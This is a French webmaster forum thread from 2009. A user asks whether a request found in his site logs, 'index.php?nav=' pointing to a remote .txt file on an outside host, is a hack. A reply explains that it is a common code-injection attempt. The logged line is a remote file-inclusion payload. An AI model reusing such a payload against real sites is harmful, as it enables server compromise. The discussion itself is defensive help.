pit-id.txt HACKERS ?

Répondre


Cette question est un moyen d’empêcher des soumissions automatisées de formulaires par des robots.
Smileys
:D :) :( :o :shock: :? 8-) :lol: :x :P :oops: :cry: :evil: :twisted: :roll: :wink: :!: :?: :idea: :arrow: :| :mrgreen: =D> #-o =P~ :^o :non: :priere: 8-|
Voir plus de smileys
  Revue du sujet
 

  Étendre la vue Revue du sujet : pit-id.txt HACKERS ?

par Nicost » 29 juil. 2009, 13:17

Salut Stopher,
Merci pour toute c'est information précieuse :wink:
J'ai pas vérifié ma base sql, vais regarder.

par stopher » 29 juil. 2009, 13:05

Salut ,

Ce sont des tentatives d'injection de code , si l'injection réussit , le pirate auras verras des infos sur le serveur à pirater ..

Les tentatives de ce genre sont trés nombreuses .. pas d'inquiétude donc tant que l'injection ne fonctionne pas sur tes pages ...

Par ce site http://www.wattenhofer.com/ , lui est bel est bien piraté , ou il appartient ( est géré ) par le pirate .

Le plus souvent , ce sont des injections qui visent webcalendar ..

Met en place crawlTrack tu verras tout ce qui est bloqué , et à quoi celà correspond , c'est assez intéressant ..

Ch.

pit-id.txt HACKERS ?

par Nicost » 29 juil. 2009, 12:47

Salut tous,
Dans mes stats j'ai retrouvé ce lien :

http://www.wattenhofer.com/charts//pit-id.txt


index.php?nav=http://www.wattenhofer.com/charts//pit-id.txt

Sa envoie sur mon ERREUR, mais je me demande si c'est du Hack !

Merci de vos réponses.